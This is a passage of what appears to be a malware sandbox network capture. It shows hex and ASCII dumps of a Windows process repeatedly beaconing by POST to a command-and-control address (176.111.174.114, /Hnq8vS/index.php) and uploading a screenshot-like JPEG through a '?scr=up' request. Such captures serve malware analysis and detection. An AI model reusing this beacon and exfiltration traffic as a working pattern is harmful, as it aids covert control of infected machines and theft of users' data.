                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          278192.168.2.449917176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:55.766356945 CEST9795OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          279176.111.174.11480192.168.2.449917C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:55.873956919 CEST9958INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:55 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          28192.168.2.449762176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:13.846182108 CEST4535OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          280192.168.2.449918176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:56.080050945 CEST9959OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          281176.111.174.11480192.168.2.449918C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:56.176745892 CEST9960INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:56 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          282192.168.2.449919176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:56.382097006 CEST9973OUTPOST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227495
                                                                                                                                          Data Raw: 2d 2d 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fc 50 8a 2f 2e 9f 52 fd 8f 77 5c d2 ec 35 fa 5c 69 9f 07 ce 47 1f 7a 75 7b 17 c1 af d8 53 f6 86 f8 d3 e1 3b 2f 89 1a 56 81 65 a2 f8 4f 50 9e 48 ad 3c 51 e2 2b f5 b7 b5 99 a3 72 92 18 91 43 4f 70 15 c1 56 30 c5 26 d2 08 38 22 bd df e1 ff 00 fc 13 93 e0 87 85 f6 5d 7c 4a f1 de b3 e2 bb c5 5c b5 9e 91 12 e9 b6 28 e0 f4 f3 1c 49 35 c4 67 d9 6d 9f e9 58 d5 c4 e1 e9 68 e5 af 91 ac 28 56 a8 ae 96 87 c5 29 f7 6a c2 7d da fd 19 bd fd 87 ff 00 63 8f 1a 78 7f ec 6f f0 5a 7f 0f c8 cd 95 d4 7c 2f e2 7b e5 b8 07 8c 03 f6 e9 2e a2 2b ea 3c b0 c7 b3 0a f2 1f 88 7f f0 49 df 12 c4 b2 5d fc 0b f8 c9 a4 eb a0 6e 31 e8 fe 27 87 fb 22 f1 cf 50 89 29 79 2d 58 01 c6 f9 26 87 24 7d d1 9e 2a 9e 3f 0f 3d f4 f5 26 b6 0e bc 76 57 f4 3e 45 a4 55 c6 45 76 df 16 7f 67 5f 8e 7f 01 ee a3 8b e2 ef c2 bd 6b 42 8a 79 0a 59 df de 59 37 d8 ef 08 19 fd c5 ca e6 19 c6 3b c6 ec 38 3c f1 5c 5b 6f ef 5d d1 94 65 0b a7 73 85 a9 45 d9 90 c7 1b d0 fd 3f 1a 96 9a f8 ee 29 72 15 cd 76 57 93 b5 44 e3 9f ad 4b 27 6a 6e dd dc 62 b1 94 4d e3 b9 4e 44 3e b5 1d 7e c7 f8 9b fe 0d 34 d5 7c 37 75 f6 7b ff 00 db 9f 74 2e d8 86 e5 3e 18 65 5f ff 00 2a 7c 1f 6f e6 39 aa d6 bf f0 6a 22 dc f5 fd bd f6 ff 00 dd 2d cf fe e5 2b f3 2a de 2b f0 05 29 b8 4f 19 66 bf e9 dd 6f fe 56 7d 64 38 4b 88 a5 1e 65 43 4f f1 43 ff 00 92 3f 1e a3 eb f8 54 be 53 fa 57 ec 8d b7 fc 1a 4e 2e 17 1f f0 f0 1d bc ff 00 d1 29 cf fe e5 6b f2 8b f6 87 f8 44 df b3 ff 00 ed 09 e3 df 80 8f af 8d 58 f8 27 c6 5a a6 80 75 51 6b e4 0b c3 67 77 2d bf 9d e5 ee 6f 2f 7f 97 bb 6e e6 db 9c 64 e3 35 ef 70 ff 00 19 70 df 13 d5 9d 3c b2 bf b4 94 12 6f dd 9c 6c 9e 9f 6a 31 fc 0f 3b 31 c9 73 3c ae 2a 58 aa 7c a9 e8 b5 8b fc 9b 38 a7 39 38 a1 36 7f 1d 39 d1 b3 9a 65 7d 49 e5 0e 65 fe e5 21 56 5e a2 92 9d bc d0 1b 11 f9 7e f4 2a f7 34 f7 eb 5f af bf f0 6e 6f fc 12 17 f6 1d ff 00 82 90 7e cd
                                                                                                                                          Data Ascii: --152138533219.jpgContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-streamJFIFCC"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?P/.Rw\5\iGzu{S;/VeOPH<Q+rCOpV0&8"]|J\(I5gmXh(V)j}cxoZ|/{.+<I]n1'"P)y-X&$}*?=&vW>EUEvg_kByYY7;8<\[o]esE?)rvWDK'jnbMND>~4|7u{t.>e_*|o9j"-+*+)OfoV}d8KeCOC?TSWN.)kDX'ZuQkgw-o/nd5pp<olj1;1s<*X|89869e}Ie!V^~*4_no~>K-[R9t/w6_gcmA~r 9qXxJ^w<MNH~@C5|\>;$62>x}<uw5oa?_r3#~?/Oz_W<Cu3V2m yXZW_x[[B$)! zLml[aj3\snV&L3y{NijJ*@79>,?gzWMeYo#'u+$L\A @oO-OU*:N3Z1R_cH^8k,,4;DO|S_s}2`$16T9seb;M_PO''wK`U!cruS|&:n`t)P#DwZZi716ikp|&Tl5CFUeSo+lKJ%y4J+_|GYuYJVsTWU8w]|e*qV8%%uzNkEV~pW^:oN*nQv|XIG(EA{WqGWZLZl*Wtd1NBAWU.G>_9'NvZa2ZJ=xS15$2U=OKt]Bm'WCUayg(~WR)Ttvi[46t6`K}4rm6>cJQsZfV|<9C474$Z9XKzu*U{b8a1HvOah((RQZ];SBzu5e:dQEN5BL3'Z:lW)vQE@w_JJc)=irSN:)i%4}ER?ORQ@u%GXD?k:k$QFhzAS:c679Z*G(*dRTt(((@QE@q'vK(dMzoz6(;RIfh((-R?W$:~4*}Y;R'f1>>((v$GAZy4-JP'ZPvU"e<ayk=h8'li_1xO.t&sv%^dz|D<OHOr;Y.VD8ud|7~g=|C)$(38Ri)J9Ji?yD2!g'YB7^tz{ii2N]RYoLU|wtzyK$c\N+#[?pbd ,mp3g+zE,VUVMuM;4}4S~x['VaQ`v1ER1'+!_EdK& [;R%s:{"z7M<zY:H+9nm58?}W\^ip]{NbL\gyVqff|Q(X.pJS<B>;(U:L*QnVO]5?Q!a(Gz'WIXQI9Ez#B MJ5OJsK+{^'_[> x7:yke]hxj?>xXeZ'<|Mxn/L^%z4:3<>LYU;3/<Z/b>c^YIl2bK<ueAUtQT7+siqpWtY+SI&zz47~]vv^i~-:_&[K6B{?)*/4BK;x%_5YEq>6EHD4Z?Zz}]$-u`rT_RY51tO%p8-Sm\jsm]_su_U:*qp~ROp((q~n#s'//4V&6w*M3< +{Hz?T|Jo{}?L~xVP_@&lm*u1M5{6(vJJxzqSRNJISkmrz&Q_:L.h:v/-u7QgBLs??k}gt47+oRiPc$4m;c;_Wx7A>C%u534d`osV VIu,f_7VeevK+IgYfyAUsp_M]'N\uo8_?v[~'44Y&h#.~NrN?]/K:u0+KhkR4(VZ,Lh0[]G->O:>W?:3XeKIgp8KKgh_o~~'wh7q"\M-TZ2R9FX)mo(KT~;Eo,n]mL#V~%|%mOx,=:|jsy#s.[-SS%Q\E6wsEW4z>!nt{L$S#H$x ?i7m'Px;JKOkWcqa7q4Fq?iK/P3]iVb.2Y@#$P9FWIupo3=*r:rT7N1J.:+E-X~SwB.oXyq"_.y~e}P?b|+-kKGZu<C("mr18DW\S<{3oir**G/T.aTe^D*]!l>_M@]ThJZQEaEU$)(Q@QUvi@%GN:}}5:6V}0;ROOiN*Xrz$H(jb=eL3!6qQId6t}RP)#tb"R1]%JoK((MdMOSRQQ"M%Sq+DM9CI>%:>I@QAQEQEaA?[QE@Q@_X}GiNUISHSdHzNt0;$UjM<zRy#E5Wu%*}XKOOs"?/zU]WtN.f}Ph?|2O2Gq\{y_wxs64-c4STc(W!@lO5xC.ej,pZJ;*'+%#osW|:yH5W^QMTURVm+=LjrQRHFjqwI?ox&d!X^-8>^x^/goTu=Y?n_r?#_?\2EQVY%ov='eU,-j+$7M&<J&qLX_I_ghCig&{4}o/w2vy*Ky@5H;6x^z2zWs3wSahz\t[BGRC|c_2Jcl<YW_'3w(`*?yB.N>1RV0RZsI+]G:3#cW%x""'%'iO2tvGJ+pV1R6(j>4|@>$tzMn]L'8I;A><]VJPnTMSF'5%dm_Jru?*Gg[~CWG'jH!k)DjVL?Zz?SR.^6uQ_&|?0\hZk,t-$UH]|VTk^&<]u-6u,y x7"#r?cq5/gtA?@_9<+mZ/k[@-b'NsM],2'=x?5YS7+@SAms&[u9UKe:7_x7[[Kn;H%b03?+>=<8;x{;I>i6m;$'/2PJM4X6R4jx"OgQNi@_/I3O_]>>TFwm~Y:2t{!GoI<#~L?_<aCOPRikiX=\99S*;s{IWd0sG5mi+]Scoqqgq8x09 ~nx[?l;1"D/Yx.}o_?s_W_c|Q0<x=c%iE;'n>/ArE2VQwW|9s|=tJuzv<;ss6U4D!UU.U$*tV"zU$GB)qO+2///k!#>2xHxJ#j_X'c5%qfe{'/t55]+[fa]{0GO&?g[|IErG]#EAMlFAy\33?SdB|:~|6K}]:OqZ"B"k$nQcWW\=iUtZt?N.L-*,ndj-)&>UN,avAv1iM6 HmWa_[C^_4M~_X6R.t6[H&f^%pv$i,`}28b"\+>NK_srC!:\t#c&n1_W9S/7A#1oL*x5ARy~73ul4KLzmNfcN~)_#Ry($(QN_w>#KXhx/e%7}HDAZ6j"&9QE;co3.$-PD'Zu6>:>*DNdM*H?ZD)=*V]K8O|P?yA};!|/)\heIR5~S>qQ4DO&NvXH;vYs2:MRl(2 OeI6'j'j$=HiEH)vDi67>P#'j0E<C.y.9'O(%GRhQEQEfEPQ`(S_:czRQ@)(t}S@Q@S-QEaEPEPEP$F'?ZOoCNu^4<sW[,r["jn_i+sm?Iu3{Fo>qo~|Zy#z/>/rB) e8j,k.t/pY=gWa0xqJXsP!!mMi$OQO|[/~;RxBd hc ,UX)<Vd}Z}>[Y'%YrTdyB#]tw}s1*o}lC/Wuwe;VAniduOD;||w_+)W[[I-i\[B\ocUK~Ow0uM";g\GHBMpk_b+M_WxlL{gZiwjp?5|Y<#;76<OaiW\$*@O5wd8Bis^m,k2_^~1,ibVs.g$X&|Z,o!q_s%vs$P$ljUF0j*\4z6mYn;c^IW4U{%:o&pxi^=oBq( |JVmm~^qsk6OM<LwNC|dhrZxzmT/si}{y,YEmt$yOE)e8jY_EF3Ii~YJo\Z$ub!J0.TOJIul+LO^~ZuihC|qVXAuY}-KMH%n!h">WS~oxN4<v,K"/lZY4V-eMpy+}tQJM;j1;+&MYkt3(a-?Gxti+hWR}:'Z<ER>U>xCZ-q'](jYG60,HfM5MsI+mnTe3X\r(6+{k>h2ozxcW> *mo#]om`m5_|1X|sWw^H$s5UKQ!Uj4Ta&6VZoo'q*UDVu?{U<DhNwyAbH"_f%2|62'cQ|1dz^xzsk:O-k!PX4+Hc#"S['4\<!])mD^[G%dX. JFcwwzN&UdZW,cv/MWW[4x?FCc:~u |[K0?<m!xjo-R{!YmvYgk~$7.$YqusoalQTdPm5KhRZ3qR;4>o<K=_)7)1qMu+Ntp@rr<s"e]>|9au'vB+~|KcetG9[R_7M-%k>4ceZt(Cj1,YO(}wqZkgW5HVI^fu}]fy#zWkOx{V1=]j0^-\[LK+#%Q&VO>xW_#d]2IId'cu/++vw\YJik3Ag,>xks{z^l,./$O16`Gls?/l5>2?+/cxK-.}vCvMcKbERUcJR~k}~WmVQ6w9c/(5jI0Gq'UP\>?x?g?5_'gGsH<'KJ}^\Eo6riR`bQHFkuN6xS]c[\4hjUHJA >N6Q'JMJIk"Wm-zIv}"_3aoM?x%3'_Ww5[xtok4Iv-\K24i2$}8t9~,<;Y<Es3ko5YURdq6wVJ:jw}U|-no]_So)9K/~>>3^QT{%ImRHf9 cGW|9(T)-!H>dkZQ*n%EFNo_/:X~w;iE{H.nI)<_*+E+YUHrn1ktkZ?u+gS5]q.n]B9,YgPW,<&
                                                                                                                                          Apr 28, 2021 22:59:56.476610899 CEST9982OUTData Raw: 56 ff 00 77 14 95 00 2a 7d ea 7d 31 3a d3 eb 40 1e 9f 76 9f 1f 7a 8e 3e f4 ea b8 99 92 a7 5a 97 9d 95 5e 3e f5 35 6a 65 2d 87 47 de 9d 51 d3 93 ad 04 0e a2 91 fa 7e 34 b4 e3 f1 00 53 bf e5 9d 1f f2 ce 97 e7 f6 ad cc c4 fd e5 07 7f ff 00 aa 9d 45
                                                                                                                                          Data Ascii: Vw*}}1:@vz>Z^>5je-GQ~4SE7YihL=Z(cD2G.|e"0?Z%@rbORg8\~)*JF0s~NJP#E?ftmG*/+R<M*mczT<z?ZM1(+I
                                                                                                                                          Apr 28, 2021 22:59:56.477526903 CEST9990OUTData Raw: 0b 99 11 d4 94 52 95 2b ce 68 17 30 c7 4f 32 a3 fb 37 b5 49 1f 7a 75 05 7b c5 67 89 e3 a4 1f ee 55 bd 85 87 4a 3c 95 a9 f6 61 ed 11 4d 87 cd 81 de 97 cb ff 00 a6 55 66 4b 5a 64 90 ed 14 bd 9b 2b da 15 f6 7f b3 fa 52 49 0e ee b5 3f 94 fe 94 61 fd
                                                                                                                                          Data Ascii: R+h0O27Izu{gUJ<aMUfKZd+RI?a:fW9U"zUKdA/jEgW1[bRy~ch^|0*iu>rI1')__O)|MRT)O,vnrNN5\ToHb*JCe
                                                                                                                                          Apr 28, 2021 22:59:56.477823019 CEST9995OUTData Raw: a5 4f b0 d4 7e 5f bd 5f 2b 27 98 6d 2e d3 8c d3 d5 01 3c 53 bc bf 7a 5c a4 f3 11 6c 3e 94 04 39 fb b5 2f 97 ef 47 97 ef 4f 94 39 88 dd 09 fe 1a 36 1a 95 a1 4c ff 00 85 27 d9 bd a9 72 87 31 1f 97 ef 47 97 ef 53 79 1e f4 92 47 e5 d3 e5 61 cc 8a ec
                                                                                                                                          Data Ascii: O~__+'m.<Sz\l>9/GO96L'r1GSyGa>SQG++2rNj9GCT_&b!eI<1GSI79zO%jzn9C%E^eL^|hZMP<aS3czT{3XJmN2H
                                                                                                                                          Apr 28, 2021 22:59:56.477838993 CEST9998OUTData Raw: cb d6 a6 65 db de 92 a3 94 d3 98 87 ca 7f 4a 6b c7 dc d4 df bc a6 49 bf 15 9f 29 5c c4 5b 0d 35 e3 f5 a9 28 a9 2f 99 11 79 5e c6 a5 55 fd de 4d 15 22 8f dd e6 a7 94 52 91 03 47 f8 d4 7e 57 b0 ab 2b 1f ad 12 0c 35 69 ca 38 c8 a3 24 7f 35 15 34 d1
                                                                                                                                          Data Ascii: eJkI)\[5(/y^UM"RG~W+5i8$546zM"iyNR0'j^THSh~+GKDLU1sl_J6/KQaex{]vc?izVzuWj;f}jz~3#mn;{Ql-*e
                                                                                                                                          Apr 28, 2021 22:59:56.478537083 CEST10000OUTData Raw: dd b2 5c c1 20 0f 04 92 5b 4b 14 c1 1c 06 d9 2a 31 00 32 93 e3 5f f0 9c 7c 4d 1f 0b 9f e0 62 7c 56 f1 30 f0 34 9a bf f6 ac 9e 0b 1a ed c7 f6 53 5f ec 09 f6 b3 69 bf c9 33 6d 01 7c cd 9b b0 31 9c 56 35 96 95 65 a7 92 6d a2 c1 3d ea e3 94 e2 e7 98
                                                                                                                                          Data Ascii: \ [K*12_|Mb|V04S_i3m|1V5em=9$je5\zI]yMJJ%ed(~wS#x2~'kk)uI4J$k}sx]MV70Q]~N[<|u
                                                                                                                                          Apr 28, 2021 22:59:56.572204113 CEST10006OUTData Raw: cf e6 5e 9c f1 56 25 d3 a5 85 80 09 9c 74 15 ea 65 b9 46 2b 01 5a ac e7 3b a9 b6 d2 e8 9b 94 a4 ff 00 f4 a5 1d 2d a4 57 5b b7 e5 e3 b3 4c 2e 36 95 38 42 3a c5 5a ef 76 94 63 15 eb f0 f3 36 fe d4 a5 b2 b2 55 e9 b1 f7 a9 9a de 6e a5 29 16 37 cf dc
                                                                                                                                          Data Ascii: ^V%teF+Z;-W[L.68B:Zvc6Un)7[yTZ?Z>\rJTMt}^S.a?H*Ty;rAOXjjXB*~etrs]P7JY#o:`3"U&9/)<9/SRy^h#
                                                                                                                                          Apr 28, 2021 22:59:56.572267056 CEST10014OUTData Raw: a7 09 3d 0d fd 36 5e 80 57 f2 c3 ff 00 05 0e 55 5f db fb e3 9a a2 80 07 c6 1f 13 00 00 e0 0f ed 5b 9a fe a5 74 a9 72 06 6b f9 6a ff 00 82 87 73 fb 7f 7c 72 3f f5 58 7c 4d ff 00 a7 5b 9a fd bb e8 f1 2b e6 f8 df fa f7 1f fd 28 fc f3 c4 c5 6c 1d 0f
                                                                                                                                          Data Ascii: =6^WU_[trkjs|r?X|M[+(l?ruIz?HD-v3q_i_5]_H,0UEI$x<FT{ygnp=OUj"'RXiPrcmxH
                                                                                                                                          Apr 28, 2021 22:59:56.572288036 CEST10017OUTData Raw: 62 0a 2a 6f 2f de 9a f1 f7 35 3c 86 9c cc 8e 8a 77 97 ef 47 97 ef 53 ca 3e 64 36 9a c0 93 91 53 79 1e f4 df 2f de ab 90 5c c7 23 5f 5f 7f c1 3a 3e 14 fc 1c f8 cb fb 2b 7c 74 f8 79 f1 17 c1 5a 2d c7 88 7c 51 e2 6f 07 f8 63 e1 f7 8a 2f ac a3 6b ad
                                                                                                                                          Data Ascii: b*o/5<wGS>d6Sy/\#__:>+|tyZ-|Qoc/kYfXgew7vvmeSBbRokZ'k_<i%-cLu{8m52cT6x,N#/N.tSMOb1*u5I=>~=gKwk
                                                                                                                                          Apr 28, 2021 22:59:56.572303057 CEST10022OUTData Raw: 79 ba 8e 9d f6 8b 07 1a 65 e4 af 14 72 cd 73 69 e4 cb 34 d1 ac d2 3b ca a1 c7 89 53 28 cd a3 89 93 8b bc 1b 8e 97 b2 69 41 46 4a da d9 39 59 a5 aa 4a 9c 55 9f 3c cf 55 e6 99 5d 6a 7a ab 4a da 3b 5d a7 dd da d7 7b dd de 2d b9 c9 de f1 82 5e 9b f1
                                                                                                                                          Data Ascii: yersi4;S(iAFJ9YJU<U]jzJ;]{-^?O.x^$Q|E<>.$APq*nBv'Bo<#mS6>tGeso,A\mim=[="o05[O[
                                                                                                                                          Apr 28, 2021 22:59:56.572840929 CEST10025OUTData Raw: 9b 25 a6 ff 00 90 0a bc b6 f8 a5 f2 3d e8 f6 42 f6 cc cc 93 4b dd f2 54 32 68 e1 ba 25 6d 79 07 fb b4 e5 b4 ec 12 a7 d8 d2 1a c5 4e 27 35 36 89 c6 70 2a 9d c6 85 f2 1c 57 65 f6 1f fa 67 51 cb a5 ef 3f 72 b9 a5 81 84 8d a9 e6 12 89 e7 f7 5e 1f 73
                                                                                                                                          Data Ascii: %=BKT2h%myN'56p*WegQ?r^sqzMVu+W07lYz&^y9J~J\gDKBu-?Yueg`cn,|\Wox|wa^_=39i-?{V"Igb


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          283192.168.2.449920176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:56.397057056 CEST9974OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          284176.111.174.11480192.168.2.449920C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:56.502569914 CEST10001INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:56 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          285192.168.2.449921176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:56.727222919 CEST10160OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
